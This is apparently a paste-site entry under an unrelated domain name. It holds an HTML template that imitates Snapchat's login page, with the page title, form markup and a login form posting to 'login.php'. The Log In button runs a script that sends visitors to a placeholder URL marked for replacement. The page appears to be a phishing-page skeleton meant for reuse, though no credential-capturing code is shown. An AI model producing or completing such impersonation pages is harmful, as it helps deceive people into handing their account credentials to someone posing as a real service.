getcoinmaster.com
1 year ago in Plain Text
<!DOCTYPE html>
<html lang="en-us" data-theme="dark">
<head>
<meta charset="utf-8">
<title>Log In • Snapchat</title>
<!-- Other meta tags and styles here -->
</head>
<body class="designV2">
<div class="pusher">
<div id="login-root">
<div class="App" style="display: none;">
<!-- Rest of your content -->
<form id="login_form" action="login.php" method="post" class="centered_form">
<!-- Other form elements -->
<div class="primary_action login-button">
<button type="button" id="loginTrigger" class="btn btn-lg btn-primary" onclick="redirectToAnotherPage()">Log In</button>
</div>
</form>
<!-- Rest of your content -->
</div>
</div>
</div>
<!-- JavaScript for redirection -->
<script>
function redirectToAnotherPage() {
window.location.href = 'https://www.example.com'; // Replace with your desired URL
}
</script>
</body>
</html>